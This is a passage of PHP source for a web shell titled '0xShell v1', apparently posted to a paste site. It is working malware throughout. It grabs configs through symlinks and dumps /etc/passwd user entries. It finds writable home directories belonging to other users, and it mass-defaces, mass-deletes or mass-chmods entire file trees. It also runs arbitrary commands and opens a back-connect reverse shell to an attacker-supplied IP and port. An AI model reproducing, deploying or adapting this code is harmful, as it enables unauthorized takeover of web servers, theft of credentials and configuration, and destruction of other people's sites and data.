  1738.  
  1739. }
  1740. } if($_POST['tipe'] == 'grab') {
  1741. echo "<center><a href='?dir=$dir/0xgrab'><font color=lime>Done</font></a></center>";
  1742. }
  1743. if($_POST['tipe'] == 'grabsym404') {
  1744. echo "<center>
  1745. <a href=\"0xsym404/root/\">Root Server</a>
  1746. <br><a href=\"0xsym404/\">Configurations</a></center>";
  1747. }
  1748. if($_POST['tipe'] == 'grabsym') {
  1749. echo "<center>
  1750. <a href=\"0xsym/root/\">Root Server</a>
  1751. <br><a href=\"0xsym/\">Configurations</a></center>";
  1752. }if($_POST['tipe'] == 'grabsymv') {
  1753. echo "<center>
  1754. <a href=\"0xsymv/root/\">Root Server</a>
  1755. <br><a href=\"0xsymv/\">Configurations</a></center>";
  1756. }
  1757.  
  1758.  
  1759. }else{
  1760. echo "<form method=\"post\" action=\"\"><center>
  1761. <select class=\"select\" name=\"tipe\" style=\"width: 450px;\" height=\"10\">
  1762. <option value=\"grab\">Config Grab</option>
  1763. <option value=\"grabsym\">Symlink Config</option>
  1764. <option value=\"grabsym404\">Symlink Config 404</option>
  1765. <option value=\"grabsymv\">VHosts Symlink Config</option>
  1766. </center></select>
  1767. <br>\n";
  1768. if(!$etcpasswd){
  1769. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1770. for($uid=0;$uid<60000;$uid++){
  1771. $ara = posix_getpwuid($uid);
  1772. if (!empty($ara)) {
  1773. while (list ($key, $val) = each($ara)){
  1774. print "$val:";
  1775. }
  1776. print "\n";
  1777. }
  1778. }
  1779. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1780. } else {
  1781. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1782. echo $etcpasswd;
  1783. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1784.  
  1785. }
  1786. }
  1787.  
  1788.  
  1789. }
  1790. elseif(isset($_GET['do']) && ($_GET['do'] == 'cekjum')) {
  1791. echo '<form method="post" action="" style="float: left;">
  1792. Dir :
  1793. <input size="30" name="cekjum" height="10" type="text"><input name="submit" value=">>" type="submit">
  1794. </form><br><br>';
  1795. if ($_POST){
  1796. echo cekjum($_REQUEST['cekjum']);
  1797. } else {
  1798. echo cekjum($_GET['cekjum']);
  1799. }
  1800. }
  1801. elseif(isset($_GET['do']) && ($_GET['do'] == 'jump')) {
  1802. $i = 0;
  1803. echo "<pre><div class='margin: 5px auto;'>";
  1804. $etc = fopen("/etc/passwd", "r");
  1805.  
  1806. while($passwd = fgets($etc)) {
  1807. if($passwd == '' || !$etc) {
  1808. echo "<font color=red>Can't read /etc/passwd</font>";
  1809. } else {
  1810.  
  1811. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1812. foreach($user_jumping[1] as $userjum) {
  1813. $userjumdir = "/home/$userjum/public_html";
  1814. $perm = permissions($userjumdir);
  1815. $perm = w($userjumdir,$perm);
  1816.  
  1817. if(is_readable($userjumdir)) {
  1818. $i++;
  1819. $jrw = "<a>[<font color=lime>R</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1820. if(is_writable($userjumdir)) {
  1821. $jrw = "<a>[<font color=lime>RW</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1822. }
  1823. echo $jrw;
  1824. }
  1825. }
  1826. }
  1827. }
  1828. if($i == 0) {
  1829. } else {
  1830. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1831. }
  1832. echo "</div></pre>";
  1833. }
  1834. elseif(isset($_GET['do']) && ($_GET['do'] == 'mass_deface')) {
  1835. echo "<center><form action=\"\" method=\"post\">\n";
  1836. $dirr=$_POST['d_dir'];
  1837. $index = $_POST["script"];
  1838. $index = str_replace('"',"'",$index);
  1839. $index = stripslashes($index);
  1840. function edit_file($file,$index){
  1841. if (is_writable($file)) {
  1842. clear_fill($file,$index);
  1843. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1844. }
  1845. else {
  1846. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1847. }
  1848. }
  1849. function hapus_massal($dir,$namafile) {
  1850. if(is_writable($dir)) {
  1851. $dira = scandir($dir);
  1852. foreach($dira as $dirb) {
  1853. $dirc = "$dir/$dirb";
  1854. $lokasi = $dirc.'/'.$namafile;
  1855. if($dirb === '.') {
  1856. if(file_exists("$dir/$namafile")) {
  1857. unlink("$dir/$namafile");
  1858. }
  1859. } elseif($dirb === '..') {
  1860. if(file_exists("".dirname($dir)."/$namafile")) {
  1861. unlink("".dirname($dir)."/$namafile");
  1862. }
  1863. } else {
  1864. if(is_dir($dirc)) {
  1865. if(is_writable($dirc)) {
  1866. if(file_exists($lokasi)) {
  1867. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1868. unlink($lokasi);
  1869. $idx = hapus_massal($dirc,$namafile);
  1870. }
  1871. }
  1872. }
  1873. }
  1874. }
  1875. }
  1876. }
  1877. function clear_fill($file,$index){
  1878. if(file_exists($file)){
  1879. $handle = fopen($file,'w');
  1880. fwrite($handle,'');
  1881. fwrite($handle,$index);
  1882. fclose($handle); } }
  1883.  
  1884. function gass(){
  1885. global $dirr , $index ;
  1886. chdir($dirr);
  1887. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1888. $files = scandir($dirr) ;
  1889. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1890. sort($files);
  1891. $n = 0 ;
  1892. foreach ($files as $file){
  1893. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1894. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1895. edit_file($file,$index);
  1896. flush();
  1897. $n = $n +1 ;
  1898. }
  1899. }
  1900. echo "<br>";
  1901. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  1902. }
  1903. function ListFiles($dirrall) {
  1904.  
  1905. if($dh = opendir($dirrall)) {
  1906.  
  1907. $files = Array();
  1908. $inner_files = Array();
  1909. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1910. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1911. while($file = readdir($dh)) {
  1912. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1913. if(is_dir($dirrall . "/" . $file)) {
  1914. $inner_files = ListFiles($dirrall . "/" . $file);
  1915. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1916. } else {
  1917. array_push($files, $dirrall . "/" . $file);
  1918. }
  1919. }
  1920. }
  1921.  
  1922. closedir($dh);
  1923. return $files;
  1924. }
  1925. }
  1926. function gass_all(){
  1927. global $index ;
  1928. $dirrall=$_POST['d_dir'];
  1929. foreach (ListFiles($dirrall) as $key=>$file){
  1930. $file = str_replace('//',"/",$file);
  1931. echo "<center><strong>$file</strong> ===>";
  1932. edit_file($file,$index);
  1933. flush();
  1934. }
  1935. $key = $key+1;
  1936. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  1937. function chmod_all(){
  1938. $chmod=$_POST['chmod'];
  1939. $dirrall=$_POST['d_dir'];
  1940. foreach (ListFiles($dirrall) as $key=>$file){
  1941. $file = str_replace('//',"/",$file);
  1942. echo "<center><strong>$file</strong> ===>";
  1943. chmod($file,$chmod);
  1944. flush();
  1945. }
  1946. $key = $key+1;
  1947. echo "<center><br><h3>$key telah ngentu chmod disini</h3></center><br>"; }
  1948. function sabun_massal($dir,$namafile,$isi_script) {
  1949. if(is_writable($dir)) {
  1950. $dira = scandir($dir);
  1951. foreach($dira as $dirb) {
  1952. $dirc = "$dir/$dirb";
  1953. $lokasi = $dirc.'/'.$namafile;
  1954. if($dirb === '.') {
  1955. file_put_contents($lokasi, $isi_script);
  1956. } elseif($dirb === '..') {
  1957. file_put_contents($lokasi, $isi_script);
  1958. } else {
  1959. if(is_dir($dirc)) {
  1960. if(is_writable($dirc)) {
  1961. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1962. file_put_contents($lokasi, $isi_script);
  1963. $idx = sabun_massal($dirc,$namafile,$isi_script);
  1964. }
  1965. }
  1966. }
  1967. }
  1968. }
  1969. }
  1970. if($_POST['mass'] == 'onedir') {
  1971. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1972. $ini="http://";
  1973. $mainpath=$_POST[d_dir];
  1974. $file=$_POST[d_file];
  1975. $dir=opendir("$mainpath");
  1976. $code=base64_encode($_POST[script]);
  1977. $indx=base64_decode($code);
  1978. while($row=readdir($dir)){
  1979. $start=@fopen("$row/$file","w+");
  1980. $finish=@fwrite($start,$indx);
  1981. if ($finish){
  1982. echo"$ini$row/$file\n";
  1983. }
  1984. }
  1985. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1986. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1987. $dir=opendir("$mainpath");
  1988. $code=base64_encode($_POST[script]);
  1989. $indx=base64_decode($code);
  1990. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1991. $finish=@fwrite($start,$indx);
  1992. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1993. }
  1994.  
  1995. }
  1996. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1997. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1998. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1999. elseif($_POST['mass'] == 'chmodkabeh') { chmod_all(); }
  2000. elseif($_POST['mass'] == 'massdeface') {
  2001. echo "<div style='margin: 5px auto; padding: 5px'>";
  2002. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  2003. echo "</div>"; }
  2004. else {
  2005. echo "
  2006. <center><font style='text-decoration: underline;'>
  2007. Select Type:<br>
  2008. </font>
  2009. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  2010. <option value=\"onedir\">Mass Deface 1 Dir</option>
  2011. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  2012. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  2013. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  2014. <option value=\"chmodkabeh\">Chmod Massal</option>
  2015. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  2016. <font style='text-decoration: underline;'>Folder:</font><br>
  2017. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  2018. <font style='text-decoration: underline;'>Filename:</font><br>
  2019. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  2020. <font style='text-decoration: underline;'>Index File:</font><br>
  2021. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  2022. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  2023. </form></center>";
  2024. }
  2025. }
  2026. elseif(isset($_GET['do']) && ($_GET['do'] == 'bc')){
  2027. echo '
  2028. <div id="back">
  2029. <h2>Back Connect</h2>
  2030. <p>Back connect will allow you to enter system commands remotely.</p>
  2031. <p>
  2032. <table>
  2033. <form action="" method="post">
  2034. <tr ><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2035. <tr ><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2036. <tr ><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2037. </form>
  2038. </table>';
  2039. if(isset($_POST['bind']))
  2040. {
  2041. echo "<p>Attempting Connection...</p>";
  2042. $ip = $_POST['ip'];
  2043. $port = $_POST['port'];
  2044. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  2045. if($errno != 0){
  2046. echo "<font color='red'>$errno : $errstr</font>";
  2047. } else if (!$sockfd) {
  2048. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  2049. } else {
  2050. fputs ($sockfd ,"
  2051. \n{################################################################}
  2052. \n..:: 0xShell v1 - Coded By 0x1999 ::..
  2053. \n
  2054. \n=> Backconnect
  2055. \n=> Back
  2056. \n
  2057. \n{################################################################}\n\n");
  2058. $dir = shell_exec("pwd");
  2059. $sysinfo = shell_exec("uname -a");
  2060. $time = Shell_exec("time");
  2061. $len = 1337;
  2062. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  2063. while(!feof($sockfd)){ $cmdPrompt = '[0x]#:> ';
  2064. fputs ($sockfd , $cmdPrompt );
  2065. $command= fgets($sockfd, $len);
  2066. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  2067. }
  2068. fclose($sockfd);
  2069. }
  2070. }
  2071. echo "</p></div>";
  2072.  
  2073. }elseif(isset($_GET['act']) && ($_GET['act'] == 'edit')) {
  2074.  
  2075. if(isset($_POST['save'])){
  2076. $file = $_POST['saveas'];
  2077. $content = magicboom($_POST['content']);
  2078. if($filez = @fopen($file,"w")){
  2079. $time = date("d-M-Y H:i",time());
  2080. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  2081. else $msg = "failed to save";
  2082. @fclose($filez);
  2083. }
  2084. else $msg = "permission denied";
  2085. }
  2086. if(!isset($file)) $file = $_GET['file'];
  2087. if($filez = @fopen($file,"r")){
  2088. $content = "";
  2089. while(!feof($filez)){
  2090. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  2091. }
  2092. @fclose($filez);
  2093. }
  2094. ?>
  2095. <form action="" method="post">
  2096. <table class="cmdbox">
  2097. <tr>
  2098. <td colspan="2">
  2099. <textarea class="output" name="content">
  2100. <?php echo $content; ?>
  2101. </textarea>
  2102. <tr>
  2103. <td colspan="2">Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;
  2104. <?php echo $msg; ?>
  2105. </td>
  2106. </tr>
  2107. </table>
  2108. </form>
  2109. <?php
  2110. }
  2111. elseif(isset($_GET['do']) && ($_GET['do'] == 'serverinfo')){
  2112.  
  2113. $s_safemode = ini_get("safe_mode");
  2114. if($s_safemode = TRUE){$s_safemode = "<span class='enabled'>[ON";}else{$s_safemode = "<span class='disabled'>[OFF"; }
  2115. if(extension_loaded('curl')){$curls="<span class='enabled'>[ON]</span>";}else{$curls="<span class='disabled'>[OFF]</span>";}
  2116. echo "Server Port: ".$_SERVER['SERVER_PORT']."<br /><br />HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."<br /><br />Operating System: ".php_uname()."<br /><br />";
  2117. if(get_magic_quotes_gpc()){echo "Magic Quotes: <span class='enabled'>[ENABLED]</span><br /><br />";}else{echo "Magic Quotes: <span class='disabled'>[DISABLED]</span><br /><br />";}
  2118. echo "PHP Version: ".phpversion()."<br /><br />Safe Mode: ".$s_safemode."]</span><br /><br />Curl: ".$curls."<br /><br />Accept Encoding: ".$_SERVER['HTTP_ACCEPT_ENCODING']."<br /><br />Admin: ".$_SERVER['SERVER_ADMIN']."<br /><br /><strong>Disabled Functions: </strong>";
  2119. if(!empty($disabled)){
  2120. foreach($disabled as $functionsdis){
  2121. echo $functionsdis.", ";
  2122. }
  2123. }else{
  2124. echo "none";
  2125. }
  2126. echo "<br /><br /><strong>/etc/passwd: </strong>";
  2127. if(is_readable("/home/etc/passwd")){
  2128. echo "<span style='color:green;'>Readable</span>";
  2129. }else{
  2130. echo "<span style='color:red;'>Unreadable</span>";
  2131. }
  2132. }elseif(isset($_GET['do']) && ($_GET['do'] == 'cmd')) {
  2133. if($_POST['do_cmd']) {
  2134. echo "<textarea class='area' rows='15' cols='60'>".exe($_POST['cmd'])."</textarea>";
  2135. }
  2136. }elseif(isset($_GET['do']) && ($_GET['do'] == 'about')){
  2137.  
  2138. echo "
  2139. <h4>Information</h4>
  2140. <p>$shell_name v$shell_version Ngelu Edition - coded by 0x1999.</p>";
  2141.  
  2142. ?>
  2143. <ul>
  2144. <li>Appearance C6 Shell.</li>
  2145. <li>File Manager By IndoXploit.</li>
  2146. <li>Thanks.</li>
  2147. </ul>
  2148. <br /><br />
  2149. <?php
  2150. }else{
  2151. function GetFileSize($file){
  2152. if(!is_dir($file))
  2153. return round(filesize($file) / 1024, 2) . " Kb";
  2154. else
  2155. return "Not Availible";
  2156. }
  2157.  
  2158. function LastModified($file){
  2159. return date("F d Y g:i:s", filemtime("$file"));}
  2160.  
  2161. ////////////
  2162.  
  2163. if(is_dir($dir) == true) {
  2164. echo '<table cellspacing="0" cellpadding="0"><tr><td class="TableHeader_Name"> FileName</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableLast">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>';
  2165. $scandir = scandir($dir);
  2166. foreach($scandir as $dirx) {
  2167. $dtype = @filetype("$dir/$dirx");
  2168. $dtime = date("F d Y g:i:s", @filemtime("$dir/$dirx"));
  2169. if(!is_dir("$dir/$dirx")) continue;
  2170. if($dirx === '..') {
  2171. $href = dirname($dir);
  2172. } elseif($dirx === '.') {
  2173. $href = $dir;
  2174. } else {
  2175. $href = $dir.'/'.$dirx;
  2176. }
  2177. if($dirx == '.') {
  2178. $act_dir = "<span id=\"titik1\">
  2179. <a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  2180. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2181.  
  2182. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2183. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2184. </form>";
  2185. }
  2186. elseif($dirx == '..')
  2187. {
  2188. $act_dir="<span id=\"titik2\"><a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  2189. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2190.  
  2191. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2192. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2193. </form>";
  2194. }
  2195. else {
  2196. $act_dir = "<a href=\"javascript:tukar('".clearspace($dirx)."_link','".clearspace($dirx)."_form');\">rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2197. }
  2198. echo "<tr class='filetr'>";
  2199. echo "<td class='td_home'><a id=\"".clearspace($dirx)."_link\" href='?dir=".$href."'><img src=''> $dirx</a>
  2200.  
  2201.  
  2202.  
  2203. <form method=\"post\" id=\"".clearspace($dirx)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2204. <input type=\"hidden\" name=\"oldname\" value=\"".$dirx."\" style=\"margin:0;padding:0;\" />
  2205. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"fol_rename\" value=\"".$dirx."\" />
  2206. <input class=\"inputzbut\" type=\"submit\" name=\"dir_rename\" value=\"rename\" />
  2207. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($dirx)."_form','".clearspace($dirx)."_link');\" />
  2208. </form>
  2209.  
  2210.  
  2211.  
  2212.  
  2213. </td>
  2214.  
  2215.  
  2216.  
  2217. ";
  2218. echo "<td class='td_home'><center>$dtype</center></td>";
  2219. echo "<td class='td_home'><center>-</center></th>";
  2220. echo "<td class='td_home'><center>".w("$dir/$dirx",permissions("$dir/$dirx"))."</center></td>";
  2221. echo "<td class='td_home'>$dtime</td>";
  2222. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2223. }
  2224. echo "</tr>";
  2225. foreach($scandir as $file) {
  2226. $ftype = filetype("$dir/$file");
  2227. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2228. $size = filesize("$dir/$file")/1024;
  2229. $size = round($size,3);
  2230. if($size > 1024) {
  2231. $size = round($size/1024,2). 'MB';
  2232. } else {
  2233. $size = $size. 'KB';
  2234. }
  2235. if(!is_file("$dir/$file")) continue;
  2236. echo "<tr class='filetr'>";
  2237. echo "<td class='td_home'>
  2238.  
  2239.  
  2240.  
  2241. <a id=\"".clearspace($file)."_link\" href='?act=view&dir=$dir&file=$dir/$file'><img src=''> $file</a>
  2242.  
  2243. <form method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2244. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  2245. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"rename\" value=\"".$file."\" />
  2246. <input type=\"submit\" name=\"do_rename\" value=\"rename\" />
  2247. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_form','".clearspace($file)."_link');\" />
  2248. </form>
  2249.  
  2250.  
  2251.  
  2252. ";
  2253. echo "<td class='td_home'><center>$ftype</center></td>";
  2254. echo "<td class='td_home'><center>$size</center></td>";
  2255. echo "<td class='td_home'><center>".w("$dir/$file",permissions("$dir/$file"))."</center></td>";
  2256. echo "<td class='td_home'>$ftime</td>";
  2257. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2258. }
  2259. echo "</tr></table>";
  2260. } else {
  2261. echo "<font color=red>can't open directory</font>";
  2262. }
  2263.  
  2264.  
  2265.  
  2266. ?></table>
  2267. <div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;">
  2268. <center>
  2269. Copyright © 2017 - 0x1999 </div>
  2270.  
  2271. <?php
  2272.  
  2273. }
  2274. @ob_flush();
  2275. ?>
  2276.  
  2277. </body>
  2278.  
  2279. </html>
Add Comment
Please, Sign In to add comment